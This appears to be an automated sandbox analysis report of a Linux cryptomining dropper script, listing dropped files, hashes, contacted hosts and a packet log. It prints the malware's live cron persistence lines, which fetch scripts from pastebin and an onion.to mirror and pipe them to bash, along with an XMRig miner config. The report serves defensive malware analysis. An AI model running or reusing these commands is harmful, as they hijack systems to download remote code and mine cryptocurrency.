File Type:ASCII text
Size (bytes):112
Entropy (8bit):4.928465164415504
Encrypted:false
MD5:97043F28E3840399AB34E377F442D99A
SHA1:6F8473D173F1917EDA7AD2C385FBED24631FE218
SHA-256:C72B4C065F2AC0227CD36870A1680AC1E06E72A47A1169C53D60BD9B44B2D01E
SHA-512:C54216A405495C6FE4F443A2C5B2E5508C23F013629B4689BFD6EFD94B6B51101A2A56AB1B7C2AA2E32D3D4B798D841AAE2ABD783D57415B0087BA24EF3E9563
Malicious:true
Reputation:low
Preview:(curl -fsSL https://pastebin.com/raw/KJcZ9HLL||wget -q -O - https://pastebin.com/raw/KJcZ9HLL)| base64 -d |bash.
/etc/cron.monthly/oanacroane
Process:/bin/bash
File Type:ASCII text
Size (bytes):112
Entropy (8bit):4.928465164415504
Encrypted:false
MD5:97043F28E3840399AB34E377F442D99A
SHA1:6F8473D173F1917EDA7AD2C385FBED24631FE218
SHA-256:C72B4C065F2AC0227CD36870A1680AC1E06E72A47A1169C53D60BD9B44B2D01E
SHA-512:C54216A405495C6FE4F443A2C5B2E5508C23F013629B4689BFD6EFD94B6B51101A2A56AB1B7C2AA2E32D3D4B798D841AAE2ABD783D57415B0087BA24EF3E9563
Malicious:true
Reputation:low
Preview:(curl -fsSL https://pastebin.com/raw/KJcZ9HLL||wget -q -O - https://pastebin.com/raw/KJcZ9HLL)| base64 -d |bash.
/etc/crontab
Process:/bin/bash
File Type:ASCII text
Size (bytes):56
Entropy (8bit):3.7574622877813324
Encrypted:false
MD5:BC07B6AB91BCEBE1915028FD89F34572
SHA1:0FCB27267093AF4213825721D848204F51770C33
SHA-256:38F31E56B6E1FDEC1CBFAD2E7CB904A8A1ABE61781FAA624507A4A73DECE3786
SHA-512:40A4C68D743C25BAA4D1E1F11F6DB486D4CC934350B076013717FEB7D947889DBA443971D69786E4C29217E9394EBDBCCBB7987D713916FB9891952A2B178762
Malicious:true
Reputation:low
Preview:0 1 * * * root /bin/httpntp.5 1 * * * root /bin/ftpsdns.
/etc/sedTLJ6tF
Process:/bin/sed
File Type:ASCII English text
Size (bytes):722
Entropy (8bit):4.7770063668556455
Encrypted:false
MD5:8F111D100EA459F68D333D63A8EF2205
SHA1:077CA9C46A964DE67C0F7765745D5C6F9E2065C3
SHA-256:0E5C204385B21E15B031C83F37212BF5A4EE77B51762B7B54BD6AD973EBDF354
SHA-512:D81767B47FB84AAF435F930356DED574EE9825EC710A2E7C26074860D8A385741D65572740137B6F9686C285A32E2951CA933393B266746988F1737AAD059ADB
Malicious:false
Reputation:low
Preview:# /etc/crontab: system-wide crontab.# Unlike any other crontab you don't have to run the `crontab'.# command to install the new version when you edit this file.# and files in /etc/cron.d. These files also have username fields,.# that none of the other crontabs do...SHELL=/bin/sh.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..# m h dom mon dow user.command.17 *.* * *.root cd / && run-parts --report /etc/cron.hourly.25 6.* * *.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ).47 6.* * 7.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ).52 6.1 * *.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ).#.
/etc/seddlpHGC
Process:/bin/sed
File Type:ASCII English text
Size (bytes):722
Entropy (8bit):4.7770063668556455
Encrypted:false
MD5:8F111D100EA459F68D333D63A8EF2205
SHA1:077CA9C46A964DE67C0F7765745D5C6F9E2065C3
SHA-256:0E5C204385B21E15B031C83F37212BF5A4EE77B51762B7B54BD6AD973EBDF354
SHA-512:D81767B47FB84AAF435F930356DED574EE9825EC710A2E7C26074860D8A385741D65572740137B6F9686C285A32E2951CA933393B266746988F1737AAD059ADB
Malicious:false
Reputation:low
Preview:# /etc/crontab: system-wide crontab.# Unlike any other crontab you don't have to run the `crontab'.# command to install the new version when you edit this file.# and files in /etc/cron.d. These files also have username fields,.# that none of the other crontabs do...SHELL=/bin/sh.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..# m h dom mon dow user.command.17 *.* * *.root cd / && run-parts --report /etc/cron.hourly.25 6.* * *.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ).47 6.* * 7.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ).52 6.1 * *.root.test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ).#.
/tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/config.json
Process:/bin/tar
File Type:ASCII text
Size (bytes):941
Entropy (8bit):4.104220312149258
Encrypted:false
MD5:FD4F058613D8196CE4C55071A474554C
SHA1:91758F90E908C16A33D1989E09582EF7461701D6
SHA-256:0F66C7229AA4245940187A2F8BFF8276239C96B26D46985E662FDC2E8CDD12B5
SHA-512:52921DAB5A26EA717A70B0A6C95B884A92A92607140261844DCBDF0522A909F4C37B570F296496732B9B166BB7DDF4DAC5E443150C9A2A74E7697E19E2EE303E
Malicious:false
Reputation:low
Preview:{. "algo": "cryptonight",. "api": {. "port": 0,. "access-token": null,. "id": null,. "worker-id": null,. "ipv6": false,. "restricted": true. },. "asm": true,. "autosave": true,. "av": 0,. "background": false,. "colors": true,. "cpu-affinity": null,. "cpu-priority": null,. "donate-level": 5,. "huge-pages": true,. "hw-aes": null,. "log-file": null,. "max-cpu-usage": 100,. "pools": [. {. "url": "donate.v2.xmrig.com:3333",. "user": "YOUR_WALLET_ADDRESS",. "pass": "x",. "rig-id": null,. "nicehash": false,. "keepalive": false,. "variant": -1,. "tls": false,. "tls-fingerprint": null. }. ],. "print-time": 60,. "retries": 5,. "retry-pause": 5,. "safe": false,. "threads": null,. "user-agent": null,. "watch": true.}
/tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig
Process:/bin/tar
File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, from 'x)', stripped
Size (bytes):5249392
Entropy (8bit):6.370382609342636
Encrypted:false
MD5:65CFCAD6DC3D31695B8F3FFA08E5D389
SHA1:CF76429996C82131C3FD8F505C705C1A151C55F4
SHA-256:BB9C62AEFA457D436EBDC82AA36F08955B2CBFDFBBC6394B2E039B9CFFAFACE4
SHA-512:BAADE6F0B989AFBE368E3EE835D653AAA3BF19DCC7A8EF9701F4AF6E27EAC900F1FAD8132BF9C298DB2D45911A7992717AD3B5ACFCF63BE0D92167C796331401
Malicious:true
Reputation:low
/tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls
Process:/bin/tar
File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, from 'x)', stripped
Size (bytes):2668048
Entropy (8bit):6.42614403541452
Encrypted:false
MD5:95721DE55AD89005484B4C21F768D94E
SHA1:3DE63B309645803503B44A8413C49111F8F569E5
SHA-256:7F52EFD3D2A99475164A9413ED2D1B947129099D67C72583633CEDBC6032F8E5
SHA-512:6BBBC20233B5ECC0FD770EE0B318C1E489828D7BB2D62ABF6D7F86802FEFCD27AB101B2A07C8ABD0CB8AB0AB0BEB03E07C2AFCF74A5C1CF2207B62E8ED211C10
Malicious:true
Yara Hits:
  • Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls, Author: Florian Roth
Reputation:low
/tmp/.tmpdropoff/rig.tar.gz
Process:/usr/bin/curl
File Type:gzip compressed data, from Unix, last modified: Thu Mar 07 09:18:52 2019
Size (bytes):3029010
Entropy (8bit):7.992009159328695
Encrypted:true
MD5:B0206C7AA2F36634A43EF3F0FA7944C5
SHA1:FBC1A1A96C8D7CEFC88DCAA1C1393E5C5232B706
SHA-256:B48DDA017B9332A26D0D13EC912C360C3965292731D7EB3A9BFE441CAAE08BB3
SHA-512:47E00F970A9A1A28D49FF1C09E47E5458F430243DC7D7EF16E2EAE7D44CFAF949B614BE3A18063F206A84BFBB8747412B8A28A8C110863650F324A0D3E6446D1
Malicious:false
Reputation:low
/var/spool/cron/crontabs/root
Process:/bin/bash
File Type:ASCII text, with very long lines
Size (bytes):451
Entropy (8bit):5.253165633199512
Encrypted:false
MD5:34F3AA4682611A11C8EA98D55CFEAC56
SHA1:FDB3056D2763F376B6982012E6AAAFA8F955590E
SHA-256:28F744BAA657C77824D8184DABC3FA3F4A4637C086EE09CCCAF2504E55646B87
SHA-512:E973D10E2BFEA560F5195B05EF69C24ACC0891E1A986B2949D6BCCF2B9856E333B75336AA90669218E729BE290258A3F31A477BAE390442BE5C6C96F2A43A66C
Malicious:true
Reputation:low
Preview:*/11 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.
/var/spool/cron/root
Process:/bin/bash
File Type:ASCII text, with very long lines
Size (bytes):450
Entropy (8bit):5.246488050072152
Encrypted:false
MD5:6B1DD92FD674847F3DE51855E0A13F1B
SHA1:E76DA56FD1BE08F2E0FE521454C8CD0ED97EC7EE
SHA-256:743D1420A1A03DA1FD116FBD2832ED7A20985D2F2EBF1BEBC0F936830CFEFD65
SHA-512:2CF0885760BD74969DB490992ACECDA9349F429C756A8E3EE52C2108AE2B5286C6D9D80C0685CF4DE2FB781F6FFCFCCEB38E669D69B6CFAD7C8C795BFC69B773
Malicious:true
Reputation:low
Preview:*/9 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash.##.

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-1-w.amazonaws.com | 54.231.120.203 | true | false | | high
github.com | 140.82.118.4 | true | false | | high
pool.minexmr.com | 37.59.45.174 | true | false | | high
pastebin.com | 104.20.208.21 | true | false | | high
github-production-release-asset-2e65be.s3.amazonaws.com | unknown | unknown | false | | high

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://pastebin.com/raw/KJcZ9HLL) | oanacroane.4.dr | false | | high
https://pastebin.com/raw/EzqVke6X | system.4.dr | false | | high
https://pastebin.com/raw/4HvzGfGm | apache.4.dr, httpntp.4.dr, root.4.dr, root0.4.dr, root1.4.dr, system.4.dr | false | | high
https://pastebin.com/raw/KJcZ9HLL | oanacroane.4.dr | false | | high
https://aziplcr72qjhzvin.onion.to/old.txt | system.4.dr | false | | high
https://pastebin.com/raw/3FDDiNwW | system.4.dr | false | | high

Contacted IPs

Public

IP | Country | ASN | ASN Name | Malicious
37.59.54.205 | France | 16276 | unknown | true
140.82.118.4 | United States | 36459 | unknown | false
54.231.120.203 | United States | 16509 | unknown | false
104.20.208.21 | United States | 13335 | unknown | false

Static File Info

General

File type:Bourne-Again shell script text executable
Entropy (8bit):5.606304569447983
TrID:
• Linux/UNIX shell script (7007/1) 100.00%
File name:AEjyioBcTB
File size:15565
MD5:82ee3a6c2e3d53ccf85108a6c644c0b9
SHA1:1db603370e30234ca2cbd5cd84f5683f76f21513
SHA256:26ebeac4492616baf977903bb8deb7803bd5a22d8a005f02398c188b0375dfa4
SHA512:76abdcac7631cf17f69145046048eddeb0d805a89225b06b649cdf23cc928386b1b590a7e3a71d4767a5c5ff36b91b56e15718f39bc9e1ad910cda4c70391c86
SSDEEP:192:gD4Ih2gySgdK2NzXqUgkLTdNjxrQ050+UIui6RE7Jr2LSZ2Lj2r2LFSfz7+ZEo8m:g8I5gdrzPgkLTdNQdZEXESk76EvP
File Content Preview:#!/bin/bash.SHELL=/bin/sh.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.#This is the Old-ReBuild Lady job copy.#.#Goal:.# The goal of this campaign is as follows;.#.- To keep the internet safe..#.- To keep them hackers from causing rea

Network Behavior

Network Port Distribution

TCP Packets

              Jul 25, 2019 13:47:05.283817053 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.283885002 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.385727882 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385773897 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385799885 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385826111 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385850906 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385885000 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385894060 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385919094 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.385919094 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.386002064 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.386030912 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.386209965 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.386267900 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.488270998 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488358021 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488400936 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488426924 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488456964 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488481998 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488507986 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488521099 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.488533020 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488557100 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488581896 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.488711119 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.488790035 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.592264891 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592305899 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592331886 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592355967 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592405081 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592436075 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592477083 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592509031 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592519999 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.592538118 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592566967 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.592650890 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.697192907 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697232962 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697257042 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697278976 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697308064 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697335005 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.697499037 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.698240995 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698302984 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698332071 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698374987 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698405981 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698432922 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.698446035 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.698571920 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.799637079 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799686909 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799714088 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799741983 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799767971 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799793959 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.799844027 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.799943924 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.800643921 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.800679922 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.800769091 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.800909042 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.800934076 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.800988913 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.801024914 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.801039934 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.801655054 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.902048111 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902079105 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902105093 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902128935 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902237892 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902250051 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.902266026 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902578115 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.902920008 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902942896 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902960062 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.902976990 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.903044939 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:05.904124975 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.904155970 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:05.904257059 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.004326105 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004360914 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004375935 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004390001 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004511118 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.004631996 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004664898 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.004719973 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.005136013 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.005155087 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.005168915 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.005203009 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.005258083 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.006325960 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.006355047 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.006443977 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.106791019 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106827974 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106848001 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106865883 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106889009 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106909990 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.106944084 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.107009888 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.107104063 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.107491970 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.107520103 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.107539892 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.107561111 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.107640982 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.108652115 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.108752966 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.108793974 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.108829021 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.108906984 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.209182978 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209227085 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209244013 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209259987 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209280014 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209296942 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209312916 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209477901 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.209711075 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209737062 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209752083 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209789038 MESZ4435005654.231.120.203192.168.1.100
              Jul 25, 2019 13:47:06.209820986 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.209883928 MESZ50056443192.168.1.10054.231.120.203
              Jul 25, 2019 13:47:06.210997105 MESZ